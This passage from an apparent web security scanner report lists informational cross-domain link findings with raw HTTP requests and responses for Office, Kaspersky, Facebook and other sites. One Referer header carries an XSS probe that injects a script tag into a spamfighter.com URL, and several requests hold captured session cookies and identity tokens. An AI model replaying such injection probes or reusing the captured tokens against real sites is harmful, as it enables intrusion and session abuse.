http://officeimg.vo.msecnd.net/_layouts/images/general/office_logo.jpg?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/images/general/search_button.png?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/jquery.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/ont.client.css?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/oo.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/_layouts/oosearch.js?b=5574%2E4000
http://officeimg.vo.msecnd.net/en-us/files/156/550/HX010151526.css?b=5574%2E4000

Request

GET /client/searchresults14.aspx?NS=MSOUC&VERSION=14&LCID=1033&SYSLCID=1033&UILCID=1033&AD=1&tl=2&Query=xss&Scope=HP%2CHA%2CRZ%2CFX%2CXT%2CTC%2CXP%2CVA%2CDC%2CEM%2CLX HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
X-OfApp: MSOUC
X-OfVer: 14
X-Office-Version: 14.0.5117.0
X-OfHelpLcid: 1033
X-OfUILcid: 1033
X-OfSysLcid: 1033
X-OfAppDetect: 1
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: office.microsoft.com
Cookie: awsuserguid=guid=c03bc980-6bad-4729-88d6-cf3740c04b05; lc=en-US; c2wav=ULC140; _DetectCookies=Y; msdn=L=1033; A=I&I=AxUFAAAAAADfBwAAPV9jhGBOQg0h7q+eMRxLCA!!; MC1=GUID=b9a5a4f722f8264b834cb9d69a104d9f&HASH=f7a4&LV=20118&V=3; WT_FPC=id=22f485b698e6e3df3a31314443653874:lv=1314445266176:ss=1314443653874; MSID=Microsoft.CreationDate=08/27/2011 14:14:15&Microsoft.LastVisitDate=08/29/2011 04:08:21&Microsoft.VisitStartDate=08/29/2011 04:08:21&Microsoft.CookieId=a6ff5e65-f963-46f4-ab65-9c919eb1ab8b&Microsoft.TokenId=db79d3a0-2a3c-4e4c-a9c0-40914b282894&Microsoft.NumberOfVisits=11&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=sx3rUy39mI68bevXQ7k87cwCqeNSopULsjYUG+hsYalGTiUx6jeQjNA6Ynoqygb01mTPbguspI0cE5QtKkCZUceVkGrDbkcyvNHXMN+wNXdxQUnzlZmBD9+p9UQ3A4gtSv4b4Da5TzGro96DrT2zvwSx7bl61d4dZMkvsbPig1l3//8Wk96/vTiO4gjz3Yay/MDldPt66DHKXXuMaAsWbo2d199zl0q2n/k4qWWq7ZXUs2rD82X4NVrQyuf112WpJ9FGl96sQUadd/iLPYoKlKsqcH/WByajuTC8KbxFINpY4YSpvG51a/eYFs2ZyYz1GZZ6CEQvAqfbKyu+W/ppuGSDFR8YOXTg9PbRr7atK99ZKGuUfwiqnioMsn3P2jreJ9MjQ0K8gM4z9qjmnZbg+hKsFjSB7F2acwb1xScBtXLDFedsEWoOcBcDGPPt8uMuMcwtaeYrqxcz1Z6aMRJIsIl0r40oWnCzf9YdVHUOUzIiHTKk/SELEwC0MEJpwYlIrXfD2hQL0Ecd2RsLSIa+Lx+Uw55bkMszUNz1TFRmwjw=&Microsoft.MicrosoftId=0346-8428-4514-6859; s_nr=1314522014548; s_vnum=1317114014550%26vn%3D1; R=200011647-8/28/2011 4:10:55; fsr.rbo={"d":90,"i":"1314522262806_565503","e":1315127115605}; msresearch=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ADM CAO CONi COR CUR DEV DSP IND OTRi OUR PSA PUBi STA STP"
SPRequestGuid: 30ebb0d8-a64f-42b2-ae00-7c7861e18eb5
X-SharePointHealthScore: 0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=9
X-LLCC: en-US
X-Machine: SN1REN141
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.6029
Date: Sun, 04 Sep 2011 14:30:48 GMT
Content-Length: 7081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head id="OOHead"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
</title><link id="css-ontclient" href="http://officeimg.vo.msecnd.net/_layouts/ont.client.css?b=5574%2E4000" rel="stylesheet" /><link id="css-content" href="http://officeimg.vo.msecnd.net/en-us/files/156/550/HX010151526.css?b=5574%2E4000" rel="stylesheet" /><script id="AjaxClientLibrary" src="http://officeimg.vo.msecnd.net/_layouts/MicrosoftAjax.js?b=5574%2E4000" type="text/javascript"></script><script id="jquerystcjs" src="http://officeimg.vo.msecnd.net/_layouts/jquery.js?b=5574%2E4000" type="text/javascript"></script>
...[SNIP]...
</script><script id="oostcjs" src="http://officeimg.vo.msecnd.net/_layouts/oo.js?b=5574%2E4000" type="text/javascript"></script><script id="oosearchstcjs" src="http://officeimg.vo.msecnd.net/_layouts/oosearch.js?b=5574%2E4000" type="text/javascript"></script>
...[SNIP]...
<div class="cdclv14HeaderLogoSearch"><img src="http://officeimg.vo.msecnd.net/_layouts/images/general/office_logo.jpg?b=5574%2E4000" alt="Office.com" /><span class="cdclv14HeaderSearch">
...[SNIP]...
<button type="submit" class="cdsrchbtn" value="" title="Click to search" alt="Click to search"><img src="http://officeimg.vo.msecnd.net/_layouts/images/general/search_button.png?b=5574%2E4000" title="Click to search" alt="Click to search" /></button>
...[SNIP]...
</span><img class="cdclv14HeaderSearchBing" src="http://officeimg.vo.msecnd.net/_layouts/images/general/bing.png?b=5574%2E4000" alt="Powered by Bing" /></div>
...[SNIP]...
<noscript><img id="DCSIMG" src="http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/njs.gif?dcsuri=/nojavascript&WT.js=No" alt="" class="cdMetricsImage" /></noscript>
...[SNIP]...

15.41. http://reservoir.marketstudio.net/reservoir previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://reservoir.marketstudio.net
Path:	/reservoir

Issue detail

The page was loaded from a URL containing a query string:

http://reservoir.marketstudio.net/reservoir?d=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2Fhtml%2FpbPage.Homepage%3Fresid%3D__RESID__%26rests%3D1315145806740&t=commerce&p=globalcommerce&p1=digriv&p2=38938839926&p3=newsession

The response contains the following link to another domain:

http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740

Request

Response

15.42. http://s7.addthis.com/js/250/addthis_widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/js/250/addthis_widget.js

Issue detail

The page was loaded from a URL containing a query string:

http://s7.addthis.com/js/250/addthis_widget.js?pub=securelist

The response contains the following links to other domains:

http://www.hyves.nl/respect/button?url={{URL}}
http://www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}

Request

GET /js/250/addthis_widget.js?pub=securelist HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.securelist.com/en/blog/2312/Another_live_XSS_vulnerability
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; dt=X; uid=0000000000000000; uvc=34|35,2|36

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:33 GMT
ETag: "f80f13-11f96-4ab531b26b740"
Accept-Ranges: bytes
Content-Length: 73622
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 14:13:44 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
if(!window._ate){var _atd="www.addthis.com/",_atr="//s7.addthis.com/",_atn="//l.addthiscdn.com/",_euc=encodeURIComponent,_duc=decodeURIComponent,_atc={dr:0,ver
...[SNIP]...
yle||"1",aZ=aG.share.url=ai.href||_ate.track.mgu(aG.share.url,{defrag:1}),a6=ai.height||"20px",au=ai.width||"75px";if(aa=="5"){a6=ai.height||"60px"}else{if(aa=="6"){a6=ai.height||"31px"}}aI.innerHTML='<iframe src="//www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:{{WIDTH}}; height:{{HEIGHT}};" allowtransparency="true"></iframe>
...[SNIP]...
",a6).replace("{{WIDTH}}",au);aI.noh=aI.ost=1}else{if(a1.indexOf("hyves_respect")>-1){var a9=h(aI,"hy:respect"),ae=aG.share.url=a9.url||_ate.track.mgu(aG.share.url,{defrag:1}),aS=a9.width||"140px",aJ='<iframe src="//www.hyves.nl/respect/button?url={{URL}}" style="border: medium none; overflow:hidden; width:{{WIDTH}}; height:22px;" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...

15.43. http://sophelle.web5.hubspot.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sophelle.web5.hubspot.com
Path:	/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884

The response contains the following link to another domain:

http://www.sophelle.com/Contact-Us/thank-you.html

Request

POST /Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884 HTTP/1.1
Host: sophelle.web5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Content-Length: 1008
Cache-Control: max-age=0
Origin: http://www.sophelle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

FormSubmitRedirectURL=http%3A%2F%2Fwww.sophelle.com%2FContact-Us%2Fthank-you.html&Lead_Src=Contact+Us+%7C+Contact+Us&LeadGen_ContactForm_14884_m0submitter_user_token=9c6ca7a5ca1546b9a6b60f57cca70bb6&C
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 14:56:14 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.sophelle.com/Contact-Us/thank-you.html
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sophelle.com/Contact-Us/thank-you.html">here</a>.</h2>
</body></html>

15.44. http://usa.kaspersky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://usa.kaspersky.com/?domain=kapersky.com

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?
http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=homep123;ord=1?
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=136009&ns=1
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js
http://support.kasperskyamericas.com/
http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
http://support.kasperskyamericas.com/home/internet-security
http://threatpost.com/en_us/your-newest-resource-fast-breaking-it-security-news-and-analysis?utm_source=Kaspersky+Home+Page&utm_medium=Ad+Unit&utm_campaign=Newsletter+Sign-up
http://twitter.com/kaspersky?campaign=20000043
http://www.facebook.com/home.php?ref=home
http://www.kaspersky-sea.com/
http://www.kaspersky.pl/
http://www.kaspersky.ro/
http://www.kaspersky.ru/
http://www.kaspersky.se/
http://www.kasperskyasia.com/
http://www.kasperskylab.co.kr/
http://www.omniture.com/
http://youtube.com/KasperskyAmericas

Request

GET /?domain=kapersky.com HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:13:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138436"
Content-Type: text/html; charset=utf-8
Content-Length: 49475
Date: Sun, 04 Sep 2011 12:17:49 GMT
X-Varnish: 1163042541 1163036284
Age: 231
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...
<noscript>
<img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=136009&ns=1"/>
</noscript>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.se'>Sverige</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.pl/'>Polska</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.ro/'>România</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" class='image' href='http://www.kaspersky.ru/'><img src='http://www.kaspersky.com/images/newdesign/russia.gif' width=33 height=10 alt=''/>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky-sea.com/'>South-East Asia</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kasperskyasia.com/'>Asia Pacific</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" class='image' href='http://www.kasperskylab.co.kr/'><img src='http://www.kaspersky.com/images/newdesign/korea.gif' width=21 height=10 alt=''/>
...[SNIP]...
<li class="leaf"><a href="http://support.kasperskyamericas.com/" class="active-trail"><span>
...[SNIP]...
<div class="title"><a href="http://threatpost.com/en_us/your-newest-resource-fast-breaking-it-security-news-and-analysis?utm_source=Kaspersky+Home+Page&utm_medium=Ad+Unit&utm_campaign=Newsletter+Sign-up" target="_blank" title="Threatpost Newsletter Sign-up" style="display:block; color:#fff;">IT Security News</a>
...[SNIP]...
<div class="content"><a href="http://threatpost.com/en_us/your-newest-resource-fast-breaking-it-security-news-and-analysis?utm_source=Kaspersky+Home+Page&utm_medium=Ad+Unit&utm_campaign=Newsletter+Sign-up" target="_blank" title="Threatpost Newsletter Sign-up" style="display:block;"><img src="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/images/HP_TP-ad.jpg" title="Threatpost Newsletter"/>
...[SNIP]...
<div style="font-family: 'arial narrow'; font-size: 1.4em; line-height: 1.3em; position: absolute; z-index: 10; margin: -80px 0 0 20px;"><a href="http://threatpost.com/en_us/your-newest-resource-fast-breaking-it-security-news-and-analysis?utm_source=Kaspersky+Home+Page&utm_medium=Ad+Unit&utm_campaign=Newsletter+Sign-up" target="_blank" title="Threatpost Newsletter Sign-up" style="display:block; color:#838177;">The Kaspersky Lab<br/>
...[SNIP]...
</div>
<a style="font-weight: bold; font-size: 1.2em; display: block; position: absolute; z-index: 10; margin: -25px 0 0 20px;" href="http://threatpost.com/en_us/your-newest-resource-fast-breaking-it-security-news-and-analysis?utm_source=Kaspersky+Home+Page&utm_medium=Ad+Unit&utm_campaign=Newsletter+Sign-up" target="_blank" title="Threatpost Newsletter Sign-up">Sign-up today »</a>
...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=homep123;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/>
</NOSCRIPT>
...[SNIP]...
<li><a href="http://support.kasperskyamericas.com/home/internet-security ">Home products</a>
...[SNIP]...
<li><a href="http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations">Corporate products</a>
...[SNIP]...
<div style="width: 26px; float: left; margin-right: 10px;"><a title="Become our fan on Facebook" href="http://www.facebook.com/home.php?ref=home#/pages/Kaspersky-Lab-Americas/98958914166?ref=ts&campaign=20000042" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-facebook.jpg" border="0" alt="Get Connected with Kaspersky on Facebook" width="26" height="26" />
...[SNIP]...
<div style="width: 26px; float: left; margin-right: 10px;"><a title="Follow us on Twitter" href="http://twitter.com/kaspersky?campaign=20000043" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-twitter.jpg" border="0" alt="Get Connected with Kaspersky on Twitter" width="26" height="26" />
...[SNIP]...
<div style="width: 26px; float: left;"><a title="YouTube Channel" href="http://youtube.com/KasperskyAmericas" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-youtube.jpg" border="0" alt="Get Connected with Kaspersky on our YouTube Channel" width="26" height="26" />
...[SNIP]...
<noscript>
<IMG SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?" mce_SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/>
</noscript>
...[SNIP]...
<noscript>
<img width="1" height="1" style="border:0" src="HTTP://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=136009&ns=1"/>
</noscript>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://tr1.kaspersky.com/b/ss/kaspersky-usa/1/H.22--NS/0?/9255282"
height="1" width="1" border="0" alt="" />
...[SNIP]...

15.45. http://usa.kaspersky.com/products-services/home-computer-security/pure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/products-services/home-computer-security/pure

Issue detail

The page was loaded from a URL containing a query string:

http://usa.kaspersky.com/products-services/home-computer-security/pure?ICID=INT1673886

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?
http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=forge518;ord=1?
http://connect.facebook.net/en_US/all.js
http://kaspersky.ugc.bazaarvoice.com/8811/2000014/writereview.htm?return=http%3A%2F%2Fusa.kaspersky.com%2Fproducts_services%2Fhome-computer-security%2Finternet-security&submissionurl=http://usa.kaspersky.com/products-services/submit-review
http://kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js
http://support.kasperskyamericas.com/
http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
http://support.kasperskyamericas.com/home/internet-security
http://twitter.com/kaspersky?campaign=20000043
http://www.facebook.com/home.php?ref=home
http://www.kaspersky-sea.com/
http://www.kaspersky.pl/
http://www.kaspersky.ro/
http://www.kaspersky.ru/
http://www.kaspersky.se/
http://www.kasperskyasia.com/
http://www.kasperskylab.co.kr/
http://www.omniture.com/
http://youtube.com/KasperskyAmericas
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.223556700/offerID.8575749809
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809
https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976000/offerID.8575749809

Request

GET /products-services/home-computer-security/pure?ICID=INT1673886 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:24:38 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315139078"
Set-Cookie: SESS0d3630958f3c3e8e08486b0d8335aea6=deleted; expires=Sat, 04-Sep-2010 12:24:46 GMT; path=/; domain=.usa.kaspersky.com; httponly
Content-Type: text/html; charset=utf-8
Content-Length: 107532
Date: Sun, 04 Sep 2011 12:24:47 GMT
X-Varnish: 1163053893
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

<script type="text/javascript" src="//kaspersky.ugc.bazaarvoice.com/static/8811/bvapi.js"> </script>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.se'>Sverige</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.pl/'>Polska</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky.ro/'>România</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" class='image' href='http://www.kaspersky.ru/'><img src='http://www.kaspersky.com/images/newdesign/russia.gif' width=33 height=10 alt=''/>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kaspersky-sea.com/'>South-East Asia</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" href='http://www.kasperskyasia.com/'>Asia Pacific</a>
...[SNIP]...
<li><a onclick="try{trackCountrySelector(this);}catch(err){}" class='image' href='http://www.kasperskylab.co.kr/'><img src='http://www.kaspersky.com/images/newdesign/korea.gif' width=21 height=10 alt=''/>
...[SNIP]...
<li class="leaf"><a href="http://support.kasperskyamericas.com/" class="active-trail"><span>
...[SNIP]...
<div style="padding-top:5px;" >
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div class="buy-button"><a class="buy-now-btn" title="Kaspersky PURE Total Security" target="_self" href="https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224975900/offerID.8575749809">Buy Now »</a>
...[SNIP]...
<div class="buy-button"><a class="buy-now-btn" title="Kaspersky PURE Total Security" target="_self" href="https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976000/offerID.8575749809">Buy Now »</a>
...[SNIP]...
<div class="buy-button"><a class="buy-now-btn" title="Kaspersky PURE Total Security" target="_self" href="https://store.digitalriver.com/store/kasperus/en_US/buy/productID.223556700/offerID.8575749809">Buy Now »</a>
...[SNIP]...
<div style="line-height:50px; float: left; margin-left: 20px;"><a href="http://kaspersky.ugc.bazaarvoice.com/8811/2000014/writereview.htm?return=http%3A%2F%2Fusa.kaspersky.com%2Fproducts_services%2Fhome-computer-security%2Finternet-security&submissionurl=http://usa.kaspersky.com/products-services/submit-review">Write a Review</a>
...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=forge518;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/>
</NOSCRIPT>
...[SNIP]...
<li><a href="http://support.kasperskyamericas.com/home/internet-security ">Home products</a>
...[SNIP]...
<li><a href="http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations">Corporate products</a>
...[SNIP]...
<div style="width: 26px; float: left; margin-right: 10px;"><a title="Become our fan on Facebook" href="http://www.facebook.com/home.php?ref=home#/pages/Kaspersky-Lab-Americas/98958914166?ref=ts&campaign=20000042" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-facebook.jpg" border="0" alt="Get Connected with Kaspersky on Facebook" width="26" height="26" />
...[SNIP]...
<div style="width: 26px; float: left; margin-right: 10px;"><a title="Follow us on Twitter" href="http://twitter.com/kaspersky?campaign=20000043" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-twitter.jpg" border="0" alt="Get Connected with Kaspersky on Twitter" width="26" height="26" />
...[SNIP]...
<div style="width: 26px; float: left;"><a title="YouTube Channel" href="http://youtube.com/KasperskyAmericas" target="_blank"><img src="/sites/all/themes/zen/kaspersky_usatheme/images/footer-youtube.jpg" border="0" alt="Get Connected with Kaspersky on our YouTube Channel" width="26" height="26" />
...[SNIP]...
<noscript>
<IMG SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?" mce_SRC="http://ad.doubleclick.net/activity;src=2342885;type=bbtom354;cat=foote902;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/>
</noscript>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://tr1.kaspersky.com/b/ss/kaspersky-usa/1/H.22--NS/0?/2358819"
height="1" width="1" border="0" alt="" />
...[SNIP]...

15.46. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/276636_10600847195_8385896_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/0ITpgsiVMtK.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FSPAMfighters&width=310&colorscheme=light&show_faces=false&stream=false&header=true&height=62 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.spamfighter.com/News_Show_Other.asp?f5f99%22%3E%3Cscript%3Eprompt(%22E-mail%22)%3C/script%3Eb43bbcbe795=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

15.47. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=newssearch&cd=6&ved=0CFAQqQIwBQ&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&ei=GmtjToK4CpDViAKH_-GiCg&usg=AFQjCNEMJQ0yjmSOBw6b7aa0Ku_nafuEqw

The response contains the following link to another domain:

http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html

